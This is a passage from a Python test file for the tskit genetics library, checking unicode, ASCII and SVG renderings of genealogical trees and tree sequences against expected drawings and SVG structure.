"┃ 10 ┃ ┃ ┃ ┃ ┃ ┃ ┃\n"
"┃ ┏┻┓ ┃ ┃ ┃ ┃ ┃ ┃ ┃\n"
"8 0 3 2 4 5 6 9 1 7\n"
)
labels = {u: str(u) for u in t.nodes()}
labels[11] = "x11xxxxxxx"
self.verify_text_rendering(t.draw_text(node_labels=labels, order="tree"), tree)
tree = (
" 14 \n"
" ┏━━━━┻━━━━┓ \n"
" ┃ 13 \n"
" ┃ ┏━━┳━╋━┳━┳━┓\n"
" ┃ 12 ┃ ┃ ┃ ┃ ┃\n"
" ┃ ┏┻┓ ┃ ┃ ┃ ┃ ┃\n"
" 11 ┃ ┃ ┃ ┃ ┃ ┃ ┃\n"
" ┏┻━┓ ┃ ┃ ┃ ┃ ┃ ┃ ┃\n"
"10 ┃ ┃ ┃ ┃ ┃ ┃ ┃ ┃\n"
"┏┻┓ ┃ ┃ ┃ ┃ ┃ ┃ ┃ ┃\n"
"0 3 8 1 7 2 4 5 6 9\n"
)
self.verify_text_rendering(t.draw_text(order="minlex"), tree)
def test_draw_multiroot_forky_tree(self):
tree = (
" 13 \n"
"┏━┳━┳━╋━┳━━┓ \n"
"┃ ┃ ┃ ┃ ┃ 12 \n"
"┃ ┃ ┃ ┃ ┃ ┏┻┓ \n"
"┃ ┃ ┃ ┃ ┃ ┃ ┃ 11 \n"
"┃ ┃ ┃ ┃ ┃ ┃ ┃ ┏━┻┓ \n"
"┃ ┃ ┃ ┃ ┃ ┃ ┃ ┃ 10 \n"
"┃ ┃ ┃ ┃ ┃ ┃ ┃ ┃ ┏┻┓ \n"
"2 4 5 6 9 1 7 8 0 3 \n"
)
nodes = io.StringIO(
"""\
id is_sample population individual time metadata
0 1 0 -1 0.00000000000000
1 1 0 -1 0.00000000000000
2 1 0 -1 0.00000000000000
3 1 0 -1 0.00000000000000
4 1 0 -1 0.00000000000000
5 1 0 -1 0.00000000000000
6 1 0 -1 0.00000000000000
7 1 0 -1 0.00000000000000
8 1 0 -1 0.00000000000000
9 1 0 -1 0.00000000000000
10 0 0 -1 0.02398248117831
11 0 0 -1 0.17378680550869
12 0 0 -1 0.19950200178411
13 0 0 -1 0.20000000000000
14 0 0 -1 5.68339203134457
"""
)
edges = io.StringIO(
"""\
left right parent child
0.00000000 1.00000000 10 0
0.00000000 1.00000000 10 3
0.00000000 1.00000000 11 8
0.00000000 1.00000000 11 10
0.00000000 1.00000000 12 1
0.00000000 1.00000000 12 7
0.00000000 1.00000000 13 2
0.00000000 1.00000000 13 4
0.00000000 1.00000000 13 5
0.00000000 1.00000000 13 6
0.00000000 1.00000000 13 9
0.00000000 1.00000000 13 12
"""
)
ts = tskit.load_text(nodes, edges, strict=False)
t = next(ts.trees())
drawn = t.draw(format="unicode", order="tree")
self.verify_text_rendering(drawn, tree)
self.verify_text_rendering(t.draw_text(order="tree"), tree)
tree = (
" 13 \n"
" ┏━━┳━╋━┳━┳━┓\n"
" 12 ┃ ┃ ┃ ┃ ┃\n"
" ┏┻┓ ┃ ┃ ┃ ┃ ┃\n"
" 11 ┃ ┃ ┃ ┃ ┃ ┃ ┃\n"
" ┏┻━┓ ┃ ┃ ┃ ┃ ┃ ┃ ┃\n"
"10 ┃ ┃ ┃ ┃ ┃ ┃ ┃ ┃\n"
"┏┻┓ ┃ ┃ ┃ ┃ ┃ ┃ ┃ ┃\n"
"0 3 8 1 7 2 4 5 6 9\n"
)
drawn = t.draw(format="unicode")
self.verify_text_rendering(drawn, tree)
self.verify_text_rendering(t.draw_text(), tree)
self.verify_text_rendering(t.draw_text(order="minlex"), tree)
def test_simple_tree_sequence(self):
ts = self.get_simple_ts()
ts_drawing = (
"9.08┊ 9 ┊ ┊ ┊ ┊ ┊\n"
" ┊ ┏━┻━┓ ┊ ┊ ┊ ┊ ┊\n"
"3.57┊ ┃ ┃ ┊ ┊ ┊ ┊ 8 ┊\n"
" ┊ ┃ ┃ ┊ ┊ ┊ ┊ ┏━┻━┓ ┊\n"
"2.31┊ ┃ ┃ ┊ 7 ┊ ┊ 7 ┊ ┃ ┃ ┊\n"
" ┊ ┃ ┃ ┊ ┏━┻━┓ ┊ ┊ ┏━┻━┓ ┊ ┃ ┃ ┊\n"
"1.75┊ ┃ ┃ ┊ ┃ ┃ ┊ 6 ┊ ┃ ┃ ┊ ┃ ┃ ┊\n"
" ┊ ┃ ┃ ┊ ┃ ┃ ┊ ┏━┻━┓ ┊ ┃ ┃ ┊ ┃ ┃ ┊\n"
"0.11┊ ┃ 5 ┊ ┃ 5 ┊ ┃ 5 ┊ ┃ 5 ┊ ┃ 5 ┊\n"
" ┊ ┃ ┏┻┓ ┊ ┃ ┏┻┓ ┊ ┃ ┏┻┓ ┊ ┃ ┏┻┓ ┊ ┃ ┏┻┓ ┊\n"
"0.02┊ 4 ┃ ┃ ┊ 4 ┃ ┃ ┊ 4 ┃ ┃ ┊ 4 ┃ ┃ ┊ 4 ┃ ┃ ┊\n"
" ┊ ┏┻┓ ┃ ┃ ┊ ┏┻┓ ┃ ┃ ┊ ┏┻┓ ┃ ┃ ┊ ┏┻┓ ┃ ┃ ┊ ┏┻┓ ┃ ┃ ┊\n"
"0.00┊ 0 1 2 3 ┊ 0 1 2 3 ┊ 0 1 2 3 ┊ 0 1 2 3 ┊ 0 1 2 3 ┊\n"
" 0.00 0.06 0.79 0.91 0.91 1.00\n"
)
self.verify_text_rendering(ts.draw_text(), ts_drawing)
ts_drawing = (
"9.08| 9 | | | | |\n"
" | +-+-+ | | | | |\n"
"3.57| | | | | | | 8 |\n"
" | | | | | | | +-+-+ |\n"
"2.31| | | | 7 | | 7 | | | |\n"
" | | | | +-+-+ | | +-+-+ | | | |\n"
"1.75| | | | | | | 6 | | | | | | |\n"
" | | | | | | | +-+-+ | | | | | | |\n"
"0.11| | 5 | | 5 | | 5 | | 5 | | 5 |\n"
" | | +++ | | +++ | | +++ | | +++ | | +++ |\n"
"0.02| 4 | | | 4 | | | 4 | | | 4 | | | 4 | | |\n"
" | +++ | | | +++ | | | +++ | | | +++ | | | +++ | | |\n"
"0.00| 0 1 2 3 | 0 1 2 3 | 0 1 2 3 | 0 1 2 3 | 0 1 2 3 |\n"
" 0.00 0.06 0.79 0.91 0.91 1.00\n"
)
self.verify_text_rendering(ts.draw_text(use_ascii=True), ts_drawing)
ts_drawing = (
"┊ 9 ┊ ┊ ┊ ┊ ┊\n"
"┊ ┏━┻━┓ ┊ ┊ ┊ ┊ ┊\n"
"┊ ┃ ┃ ┊ ┊ ┊ ┊ 8 ┊\n"
"┊ ┃ ┃ ┊ ┊ ┊ ┊ ┏━┻━┓ ┊\n"
"┊ ┃ ┃ ┊ 7 ┊ ┊ 7 ┊ ┃ ┃ ┊\n"
"┊ ┃ ┃ ┊ ┏━┻━┓ ┊ ┊ ┏━┻━┓ ┊ ┃ ┃ ┊\n"
"┊ ┃ ┃ ┊ ┃ ┃ ┊ 6 ┊ ┃ ┃ ┊ ┃ ┃ ┊\n"
"┊ ┃ ┃ ┊ ┃ ┃ ┊ ┏━┻━┓ ┊ ┃ ┃ ┊ ┃ ┃ ┊\n"
"┊ ┃ 5 ┊ ┃ 5 ┊ ┃ 5 ┊ ┃ 5 ┊ ┃ 5 ┊\n"
"┊ ┃ ┏┻┓ ┊ ┃ ┏┻┓ ┊ ┃ ┏┻┓ ┊ ┃ ┏┻┓ ┊ ┃ ┏┻┓ ┊\n"
"┊ 4 ┃ ┃ ┊ 4 ┃ ┃ ┊ 4 ┃ ┃ ┊ 4 ┃ ┃ ┊ 4 ┃ ┃ ┊\n"
"┊ ┏┻┓ ┃ ┃ ┊ ┏┻┓ ┃ ┃ ┊ ┏┻┓ ┃ ┃ ┊ ┏┻┓ ┃ ┃ ┊ ┏┻┓ ┃ ┃ ┊\n"
"┊ 0 1 2 3 ┊ 0 1 2 3 ┊ 0 1 2 3 ┊ 0 1 2 3 ┊ 0 1 2 3 ┊\n"
"0.00 0.06 0.79 0.91 0.91 1.00\n"
)
self.verify_text_rendering(ts.draw_text(time_label_format=""), ts_drawing)
ts_drawing = (
"┊ 9 ┊ ┊ ┊ ┊ ┊\n"
"┊ ┏━┻━┓ ┊ ┊ ┊ ┊ ┊\n"
"┊ ┃ ┃ ┊ ┊ ┊ ┊ 8 ┊\n"
"┊ ┃ ┃ ┊ ┊ ┊ ┊ ┏━┻━┓ ┊\n"
"┊ ┃ ┃ ┊ 7 ┊ ┊ 7 ┊ ┃ ┃ ┊\n"
"┊ ┃ ┃ ┊ ┏━┻━┓ ┊ ┊ ┏━┻━┓ ┊ ┃ ┃ ┊\n"
"┊ ┃ ┃ ┊ ┃ ┃ ┊ 6 ┊ ┃ ┃ ┊ ┃ ┃ ┊\n"
"┊ ┃ ┃ ┊ ┃ ┃ ┊ ┏━┻━┓ ┊ ┃ ┃ ┊ ┃ ┃ ┊\n"
"┊ ┃ 5 ┊ ┃ 5 ┊ ┃ 5 ┊ ┃ 5 ┊ ┃ 5 ┊\n"
"┊ ┃ ┏┻┓ ┊ ┃ ┏┻┓ ┊ ┃ ┏┻┓ ┊ ┃ ┏┻┓ ┊ ┃ ┏┻┓ ┊\n"
"┊ 4 ┃ ┃ ┊ 4 ┃ ┃ ┊ 4 ┃ ┃ ┊ 4 ┃ ┃ ┊ 4 ┃ ┃ ┊\n"
"┊ ┏┻┓ ┃ ┃ ┊ ┏┻┓ ┃ ┃ ┊ ┏┻┓ ┃ ┃ ┊ ┏┻┓ ┃ ┃ ┊ ┏┻┓ ┃ ┃ ┊\n"
"┊ 0 1 2 3 ┊ 0 1 2 3 ┊ 0 1 2 3 ┊ 0 1 2 3 ┊ 0 1 2 3 ┊\n"
"┊ ┊ ┊ ┊ ┊ ┊\n"
)
self.verify_text_rendering(
ts.draw_text(time_label_format="", position_label_format=""), ts_drawing
)
def test_tree_sequence_non_minlex(self):
nodes = io.StringIO(
"""\
id is_sample time population individual metadata
0 1 0.000000 0 -1
1 1 0.000000 0 -1
2 1 0.000000 0 -1
3 1 0.000000 0 -1
4 1 0.000000 0 -1
5 0 1.174545 0 -1
6 0 1.207717 0 -1
7 0 1.276422 0 -1
8 0 1.613390 0 -1
9 0 2.700069 0 -1
"""
)
edges = io.StringIO(
"""\
left right parent child
0.000000 1.000000 5 0
0.000000 1.000000 5 1
0.000000 0.209330 6 4
0.000000 0.209330 6 5
0.000000 1.000000 7 2
0.209330 1.000000 7 5
0.000000 0.209330 7 6
0.209330 1.000000 8 3
0.209330 1.000000 8 4
0.000000 0.209330 9 3
0.000000 1.000000 9 7
0.209330 1.000000 9 8
"""
)
ts = tskit.load_text(nodes, edges, strict=False)
drawn_minlex = (
"2.70┊ 9 ┊ 9 ┊\n"
" ┊ ┏━┻━┓ ┊ ┏━┻━━┓ ┊\n"
"1.61┊ ┃ ┃ ┊ ┃ 8 ┊\n"
" ┊ ┃ ┃ ┊ ┃ ┏┻┓ ┊\n"
"1.28┊ 7 ┃ ┊ 7 ┃ ┃ ┊\n"
" ┊ ┏━┻━┓ ┃ ┊ ┏┻━┓ ┃ ┃ ┊\n"
"1.21┊ 6 ┃ ┃ ┊ ┃ ┃ ┃ ┃ ┊\n"
" ┊ ┏┻━┓ ┃ ┃ ┊ ┃ ┃ ┃ ┃ ┊\n"
"1.17┊ 5 ┃ ┃ ┃ ┊ 5 ┃ ┃ ┃ ┊\n"
" ┊ ┏┻┓ ┃ ┃ ┃ ┊ ┏┻┓ ┃ ┃ ┃ ┊\n"
"0.00┊ 0 1 4 2 3 ┊ 0 1 2 3 4 ┊\n"
" 0.00 0.21 1.00\n"
)
self.verify_text_rendering(ts.draw_text(order="minlex"), drawn_minlex)
self.verify_text_rendering(ts.draw_text(), drawn_minlex)
drawn_tree = (
"2.70┊ 9 ┊ 9 ┊\n"
" ┊ ┏━┻━┓ ┊ ┏━┻━━┓ ┊\n"
"1.61┊ ┃ ┃ ┊ ┃ 8 ┊\n"
" ┊ ┃ ┃ ┊ ┃ ┏┻┓ ┊\n"
"1.28┊ ┃ 7 ┊ 7 ┃ ┃ ┊\n"
" ┊ ┃ ┏━┻━┓ ┊ ┏━┻┓ ┃ ┃ ┊\n"
"1.21┊ ┃ ┃ 6 ┊ ┃ ┃ ┃ ┃ ┊\n"
" ┊ ┃ ┃ ┏━┻┓ ┊ ┃ ┃ ┃ ┃ ┊\n"
"1.17┊ ┃ ┃ ┃ 5 ┊ ┃ 5 ┃ ┃ ┊\n"
" ┊ ┃ ┃ ┃ ┏┻┓ ┊ ┃ ┏┻┓ ┃ ┃ ┊\n"
"0.00┊ 3 2 4 0 1 ┊ 2 0 1 3 4 ┊\n"
" 0.00 0.21 1.00\n"
)
self.verify_text_rendering(ts.draw_text(order="tree"), drawn_tree)
def test_max_tree_height(self):
ts = self.get_simple_ts()
tree = (
" 9 \n"
" ┏━┻━┓ \n"
" ┃ ┃ \n"
" ┃ ┃ \n"
" ┃ ┃ \n"
" ┃ ┃ \n"
" ┃ ┃ \n"
" ┃ ┃ \n"
" ┃ 5 \n"
" ┃ ┏┻┓\n"
" 4 ┃ ┃\n"
"┏┻┓ ┃ ┃\n"
"0 1 2 3\n"
)
t = ts.first()
self.verify_text_rendering(t.draw_text(max_tree_height="ts"), tree)
tree = (
" 9 \n"
" ┏━┻━┓ \n"
" ┃ 5 \n"
" ┃ ┏┻┓\n"
" 4 ┃ ┃\n"
"┏┻┓ ┃ ┃\n"
"0 1 2 3\n"
)
t = ts.first()
self.verify_text_rendering(t.draw_text(max_tree_height="tree"), tree)
for bad_max_tree_height in [1, "sdfr", ""]:
with pytest.raises(ValueError):
t.draw_text(max_tree_height=bad_max_tree_height)
class TestDrawSvg(TestTreeDraw, xmlunittest.XmlTestCase):
"""
Tests the SVG tree drawing.
"""
def verify_basic_svg(self, svg, width=200, height=200):
prefix = "{http://www.w3.org/2000/svg}"
root = xml.etree.ElementTree.fromstring(svg)
assert root.tag == prefix + "svg"
assert width == int(root.attrib["width"])
assert height == int(root.attrib["height"])
# Verify the class structure of the svg
root_group = root.find(prefix + "g")
assert "class" in root_group.attrib
assert re.search(r"\b(tree|tree-sequence)\b", root_group.attrib["class"])
if "tree-sequence" in root_group.attrib["class"]:
trees = None
for g in root_group.findall(prefix + "g"):
if "trees" in g.attrib.get("class", ""):
trees = g
break
assert trees is not None # Must have found a trees group
first_treebox = trees.find(prefix + "g")
assert "class" in first_treebox.attrib
assert re.search(r"\btreebox\b", first_treebox.attrib["class"])
first_tree = first_treebox.find(prefix + "g")
assert "class" in first_tree.attrib
assert re.search(r"\btree\b", first_tree.attrib["class"])
else:
first_tree = root_group
# Check that we have edges, symbols, and labels groups
groups = first_tree.findall(prefix + "g")
assert len(groups) > 0
for group in groups:
assert "class" in group.attrib
cls = group.attrib["class"]
assert re.search(r"\broot\b", cls)
def test_draw_file(self):
t = self.get_binary_tree()
fd, filename = tempfile.mkstemp(prefix="tskit_viz_")
try:
os.close(fd)
svg = t.draw(path=filename)
assert os.path.getsize(filename) > 0
with open(filename) as tmp:
other_svg = tmp.read()
assert svg == other_svg
os.unlink(filename)
svg = t.draw_svg(path=filename)
assert os.path.getsize(filename) > 0
with open(filename) as tmp:
other_svg = tmp.read()
self.verify_basic_svg(svg)
self.verify_basic_svg(other_svg)
ts = t.tree_sequence
svg = ts.draw_svg(path=filename)
assert os.path.getsize(filename) > 0
with open(filename) as tmp:
other_svg = tmp.read()
self.verify_basic_svg(svg)
self.verify_basic_svg(other_svg)
finally:
os.unlink(filename)
def test_draw_defaults(self):
t = self.get_binary_tree()
svg = t.draw()
self.verify_basic_svg(svg)
svg = t.draw_svg()
self.verify_basic_svg(svg)
def test_draw_nonbinary(self):
t = self.get_nonbinary_tree()
svg = t.draw()
self.verify_basic_svg(svg)
svg = t.draw_svg()
self.verify_basic_svg(svg)
def test_draw_multiroot(self):
t = self.get_multiroot_tree()
svg = t.draw()
self.verify_basic_svg(svg)
svg = t.draw_svg()
self.verify_basic_svg(svg)
def test_draw_mutations_over_roots(self):
t = self.get_mutations_over_roots_tree()
svg = t.draw()
self.verify_basic_svg(svg)
svg = t.draw_svg()
self.verify_basic_svg(svg)
def test_draw_unary(self):
t = self.get_unary_node_tree()
svg = t.draw()
self.verify_basic_svg(svg)
svg = t.draw_svg()
self.verify_basic_svg(svg)
def test_draw_empty(self):
t = self.get_empty_tree()
with pytest.raises(ValueError):
t.draw()
with pytest.raises(ValueError):
t.draw_svg()
def test_draw_zero_roots(self):
t = self.get_zero_roots_tree()
with pytest.raises(ValueError):
t.draw()
with pytest.raises(ValueError):
t.draw_svg()
def test_draw_zero_edge(self):
t = self.get_zero_edge_tree()
svg = t.draw()
self.verify_basic_svg(svg)
svg = t.draw_svg()
self.verify_basic_svg(svg)
def test_width_height(self):
t = self.get_binary_tree()
w = 123
h = 456
svg = t.draw(width=w, height=h)
self.verify_basic_svg(svg, w, h)
svg = t.draw_svg(size=(w, h))
self.verify_basic_svg(svg, w, h)
def test_node_labels(self):
t = self.get_binary_tree()
labels = {u: "XXX" for u in t.nodes()}
svg = t.draw(format="svg", node_labels=labels)
self.verify_basic_svg(svg)
assert svg.count("XXX") == t.num_nodes
svg = t.draw_svg(node_label_attrs={u: {"text": labels[u]} for u in t.nodes()})
self.verify_basic_svg(svg)
assert svg.count("XXX") == t.num_nodes
def test_one_node_label(self):
t = self.get_binary_tree()
labels = {0: "XXX"}
svg = t.draw(format="svg", node_labels=labels)
self.verify_basic_svg(svg)
assert svg.count("XXX") == 1
svg = t.draw_svg(node_label_attrs={0: {"text": "XXX"}})
self.verify_basic_svg(svg)
assert svg.count("XXX") == 1
def test_no_node_labels(self):
t = self.get_binary_tree()
labels = {}
svg = t.draw(format="svg", node_labels=labels)
self.verify_basic_svg(svg)
# Can't really test for much here if we don't understand the SVG
def test_one_node_colour(self):
t = self.get_binary_tree()
colour = "rgb(0, 1, 2)"
colours = {0: colour}
svg = t.draw(format="svg", node_colours=colours)
self.verify_basic_svg(svg)
assert svg.count(f"fill:{colour}") == 1
svg = t.draw_svg(node_attrs={0: {"fill": colour}})
self.verify_basic_svg(svg)
assert svg.count(f'fill="{colour}"') == 1
def test_all_nodes_colour(self):
t = self.get_binary_tree()
colours = {u: f"rgb({u}, {u}, {u})" for u in t.nodes()}
svg = t.draw(format="svg", node_colours=colours)
self.verify_basic_svg(svg)
for colour in colours.values():
assert svg.count(f"fill:{colour}") == 1
svg = t.draw_svg(node_attrs={u: {"fill": colours[u]} for u in t.nodes()})
self.verify_basic_svg(svg)
assert svg.count(f'fill="{colour}"') == 1
for colour in colours.values():
assert svg.count(f'fill="{colour}"') == 1
def test_unplotted_node(self):
t = self.get_binary_tree()
colour = None
colours = {0: colour}
svg = t.draw(format="svg", node_colours=colours)
assert svg.count("opacity:0") == 1
def test_one_edge_colour(self):
t = self.get_binary_tree()
colour = "rgb(0, 1, 2)"
colours = {0: colour}
svg = t.draw(format="svg", edge_colours=colours)
self.verify_basic_svg(svg)
assert svg.count(f"stroke:{colour}") > 0
svg = t.draw_svg(edge_attrs={0: {"stroke": colour}})
self.verify_basic_svg(svg)
assert svg.count(f'stroke="{colour}"') == 1
def test_one_mutation_label_colour(self):
t = self.get_binary_tree()
colour = "rgb(0, 1, 2)"
svg = t.draw_svg(mutation_label_attrs={0: {"stroke": colour}})
self.verify_basic_svg(svg)
assert svg.count(f'stroke="{colour}"') == 1
def test_bad_tree_height_scale(self):
t = self.get_binary_tree()
for bad_scale in ["te", "asdf", "", [], b"23"]:
with pytest.raises(ValueError):
t.draw_svg(tree_height_scale=bad_scale)
def test_bad_max_tree_height(self):
t = self.get_binary_tree()
for bad_height in ["te", "asdf", "", [], b"23"]:
with pytest.raises(ValueError):
t.draw_svg(max_tree_height=bad_height)
def test_height_scale_time_and_max_tree_height(self):
ts = msprime.simulate(5, recombination_rate=2, random_seed=2)
t = ts.first()
# The default should be the same as tree.
svg1 = t.draw_svg(max_tree_height="tree")
self.verify_basic_svg(svg1)
svg2 = t.draw_svg()
assert svg1 == svg2
svg3 = t.draw_svg(max_tree_height="ts")
assert svg1 != svg3
svg4 = t.draw_svg(max_tree_height=max(ts.tables.nodes.time))
assert svg3 == svg4
def test_height_scale_rank_and_max_tree_height(self):
# Make sure the rank height scale and max_tree_height interact properly.
ts = msprime.simulate(5, recombination_rate=2, random_seed=2)
t = ts.first()
# The default should be the same as tree.
svg1 = t.draw_svg(max_tree_height="tree", tree_height_scale="rank")
self.verify_basic_svg(svg1)
svg2 = t.draw_svg(tree_height_scale="rank")
assert svg1 == svg2
svg3 = t.draw_svg(max_tree_height="ts", tree_height_scale="rank")
assert svg1 != svg3
self.verify_basic_svg(svg3)
# Numeric max tree height not supported for rank scale.
with pytest.raises(ValueError):
t.draw_svg(max_tree_height=2, tree_height_scale="rank")
#
# TODO: update the tests below here to check the new SVG based interface.
#
def test_all_edges_colour(self):
t = self.get_binary_tree()
colours = {u: "rgb({u},255,{u})".format(u=u) for u in t.nodes() if u != t.root}
svg = t.draw(format="svg", edge_colours=colours)
self.verify_basic_svg(svg)
for colour in colours.values():
assert svg.count(f"stroke:{colour}") > 0
def test_unplotted_edge(self):
t = self.get_binary_tree()
colour = None
colours = {0: colour}
svg = t.draw(format="svg", edge_colours=colours)
self.verify_basic_svg(svg)
assert svg.count("opacity:0") == 1
def test_mutation_labels(self):
t = self.get_binary_tree()
labels = {u.id: "XXX" for u in t.mutations()}
svg = t.draw(format="svg", mutation_labels=labels)
self.verify_basic_svg(svg)
assert svg.count("XXX") == t.num_mutations
def test_one_mutation_label(self):
t = self.get_binary_tree()
labels = {0: "XXX"}
svg = t.draw(format="svg", mutation_labels=labels)
self.verify_basic_svg(svg)
assert svg.count("XXX") == 1
def test_no_mutation_labels(self):
t = self.get_binary_tree()
labels = {}
svg = t.draw(format="svg", mutation_labels=labels)
self.verify_basic_svg(svg)
# Can't really test for much here if we don't understand the SVG
def test_one_mutation_colour(self):
t = self.get_binary_tree()
colour = "rgb(0, 1, 2)"
colours = {0: colour}
svg = t.draw(format="svg", mutation_colours=colours)
self.verify_basic_svg(svg)
assert svg.count(f"fill:{colour}") == 1
def test_all_mutations_colour(self):
t = self.get_binary_tree()
colours = {
mut.id: f"rgb({mut.id}, {mut.id}, {mut.id})" for mut in t.mutations()
}
svg = t.draw(format="svg", mutation_colours=colours)
self.verify_basic_svg(svg)
for colour in colours.values():
assert svg.count(f"fill:{colour}") == 1
def test_unplotted_mutation(self):
t = self.get_binary_tree()
colour = None
colours = {0: colour}
svg = t.draw(format="svg", mutation_colours=colours)
self.verify_basic_svg(svg)
assert svg.count("fill-opacity:0") == 1
def test_max_tree_height(self):
nodes = io.StringIO(
"""\
id is_sample time
0 1 0
1 1 0
2 1 0
3 0 1
4 0 2
5 0 3
"""
)
edges = io.StringIO(
"""\
left right parent child
0 1 5 2
0 1 5 3
1 2 4 2
1 2 4 3
0 2 3 0
0 2 3 1
"""
)
ts = tskit.load_text(nodes, edges, strict=False)
svg1 = ts.at_index(0).draw()
svg2 = ts.at_index(1).draw()
# if not scaled to ts, the edge above node 0 is of a different length in both
# trees, because the root is at a different height. We expect a group like
# <path class="edge" d="M 0 0 V -46 H 22.5" /><text>0</text>
str_pos = svg1.find(">0<")
snippet1 = svg1[svg1.rfind("edge", 0, str_pos) : str_pos]
str_pos = svg2.find(">0<")
snippet2 = svg2[svg2.rfind("edge", 0, str_pos) : str_pos]
assert snippet1 != snippet2
svg1 = ts.at_index(0).draw(max_tree_height="ts")
svg2 = ts.at_index(1).draw(max_tree_height="ts")
# when scaled, node 3 should be at the *same* height in both trees, so the edge
# definition should be the same
self.verify_basic_svg(svg1)
self.verify_basic_svg(svg2)
str_pos = svg1.find(">0<")
snippet1 = svg1[svg1.rfind("edge", 0, str_pos) : str_pos]
str_pos = svg2.find(">0<")
snippet2 = svg2[svg2.rfind("edge", 0, str_pos) : str_pos]
assert snippet1 == snippet2
def test_draw_sized_tree(self):
tree = self.get_binary_tree()
svg = tree.draw_svg(size=(600, 400))
self.verify_basic_svg(svg, width=600, height=400)
def test_draw_simple_ts(self):
ts = msprime.simulate(5, recombination_rate=1, random_seed=1)
svg = ts.draw_svg()
self.verify_basic_svg(svg, width=200 * ts.num_trees)
def test_draw_integer_breaks_ts(self):
# NB: msprime 1.0 will mean updating this to `simulate(... discrete_genome=True)
recomb_map = msprime.RecombinationMap.uniform_map(
length=1000, rate=0.005, num_loci=1000
)
ts = msprime.simulate(5, recombination_map=recomb_map, random_seed=1)
assert ts.num_trees > 2
svg = ts.draw_svg()
self.verify_basic_svg(svg, width=200 * ts.num_trees)
axis_pos = svg.find('class="axis"')
for b in ts.breakpoints():
assert b == round(b)
assert svg.find(f">{b:.0f}<", axis_pos) != -1
def test_draw_even_height_ts(self):
ts = msprime.simulate(5, recombination_rate=1, random_seed=1)
svg = ts.draw_svg(max_tree_height="tree")
self.verify_basic_svg(svg, width=200 * ts.num_trees)
def test_draw_sized_ts(self):
ts = msprime.simulate(5, recombination_rate=1, random_seed=1)
svg = ts.draw_svg(size=(600, 400))
self.verify_basic_svg(svg, width=600, height=400)
def test_tree_height_scale(self):
ts = msprime.simulate(4, random_seed=2)
svg = ts.draw_svg(tree_height_scale="time")
self.verify_basic_svg(svg)
svg = ts.draw_svg(tree_height_scale="log_time")
self.verify_basic_svg(svg)
svg = ts.draw_svg(tree_height_scale="rank")
self.verify_basic_svg(svg)
for bad_scale in [0, "", "NOT A SCALE"]:
with pytest.raises(ValueError):
ts.draw_svg(tree_height_scale=bad_scale)
def test_x_scale(self):
ts = msprime.simulate(4, random_seed=2)
svg = ts.draw_svg(x_scale="physical")
self.verify_basic_svg(svg)
svg = ts.draw_svg(x_scale="treewise")
self.verify_basic_svg(svg)
def test_bad_x_scale(self):
ts = msprime.simulate(4, random_seed=2)
for bad_x_scale in ["te", "asdf", "", [], b"23"]:
with pytest.raises(ValueError):
ts.draw_svg(x_scale=bad_x_scale)
def test_no_edges(self):
ts = msprime.simulate(10, random_seed=2)
tables = ts.dump_tables()
tables.edges.clear()
ts_no_edges = tables.tree_sequence()
svg = ts_no_edges.draw_svg() # This should just be a row of 10 circles
self.verify_basic_svg(svg)
assert svg.count("circle") == 10
assert svg.count("path") == 0
svg = ts_no_edges.draw_svg(force_root_branch=True)
self.verify_basic_svg(svg)
assert svg.count("circle") == 10
assert svg.count("path") == 10
# If there is a mutation, the root branches should be there too
ts = msprime.mutate(ts, rate=1, random_seed=1)
tables = ts.dump_tables()
tables.edges.clear()
ts_no_edges = tables.tree_sequence().simplify()
assert ts_no_edges.num_mutations > 0 # Should have some singletons
svg = ts_no_edges.draw_svg()
self.verify_basic_svg(svg)
assert svg.count("circle") == 10
assert svg.count("path") == 10
assert svg.count("rect") == ts_no_edges.num_mutations
def test_tree_root_branch(self):
# in the simple_ts, there are root mutations in the first tree but not the second
ts = self.get_simple_ts()
tree_with_root_mutations = ts.at_index(0)
root1 = tree_with_root_mutations.root
tree_without_root_mutations = ts.at_index(1)
root2 = tree_without_root_mutations.root
svg1 = tree_with_root_mutations.draw_svg()
svg2a = tree_without_root_mutations.draw_svg()
svg2b = tree_without_root_mutations.draw_svg(force_root_branch=True)
self.verify_basic_svg(svg1)
self.verify_basic_svg(svg2a)
self.verify_basic_svg(svg2b)
# Last <path> should be the root branch, if it exists
edge_str = '<path class="edge" d='
str_pos1 = svg1.rfind(edge_str, 0, svg1.find(f">{root1}<"))
str_pos2a = svg2a.rfind(edge_str, 0, svg2a.find(f">{root2}<"))
str_pos2b = svg2b.rfind(edge_str, 0, svg2b.find(f">{root2}<"))
snippet1 = svg1[str_pos1 + len(edge_str) : svg1.find(">", str_pos1)]
snippet2a = svg2a[str_pos2a + len(edge_str) : svg2a.find(">", str_pos2a)]
snippet2b = svg2b[str_pos2b + len(edge_str) : svg2b.find(">", str_pos2b)]
assert snippet1.startswith('"M 0 0')
assert snippet2a.startswith('"M 0 0')
assert snippet2b.startswith('"M 0 0')
assert "H 0" in snippet1
assert not ("H 0" in snippet2a) # No root branch
assert "H 0" in snippet2b
def test_known_svg_tree_no_mut(self):
tree = self.get_simple_ts().at_index(1)
svg = tree.draw_svg(
root_svg_attributes={"id": "XYZ"}, style=".edge {stroke: blue}"
)
# Prettify the SVG code for easy inspection
svg = xml.dom.minidom.parseString(svg).toprettyxml()
svg_fn = os.path.join(os.path.dirname(__file__), "data", "svg", "tree.svg")
with open(svg_fn, "rb") as file:
expected_svg = file.read()
self.assertXmlEquivalentOutputs(svg, expected_svg)
def test_known_svg_tree_root_mut(self):
tree = self.get_simple_ts().at_index(0) # Tree 0 has a few mutations above root
svg = tree.draw_svg(
root_svg_attributes={"id": "XYZ"}, style=".edge {stroke: blue}"
)
# Prettify the SVG code for easy inspection
svg = xml.dom.minidom.parseString(svg).toprettyxml()
svg_fn = os.path.join(os.path.dirname(__file__), "data", "svg", "mut_tree.svg")
with open(svg_fn, "rb") as file:
expected_svg = file.read()
self.assertXmlEquivalentOutputs(svg, expected_svg)
def test_known_svg_ts(self):
ts = self.get_simple_ts()
svg = ts.draw_svg(
root_svg_attributes={"id": "XYZ"}, style=".edge {stroke: blue}"
)
# Prettify the SVG code for easy inspection
svg = xml.dom.minidom.parseString(svg).toprettyxml()
svg_fn = os.path.join(os.path.dirname(__file__), "data", "svg", "ts.svg")
self.verify_basic_svg(svg, width=200 * ts.num_trees)
with open(svg_fn, "rb") as file:
expected_svg = file.read()
self.assertXmlEquivalentOutputs(svg, expected_svg)
class TestRounding:
def test_rnd(self):
assert 0 == drawing.rnd(0)
assert math.inf == drawing.rnd(math.inf)
assert 1 == drawing.rnd(1)
assert 1.1 == drawing.rnd(1.1)
assert 1.11111 == drawing.rnd(1.111111)
assert 1111110 == drawing.rnd(1111111)
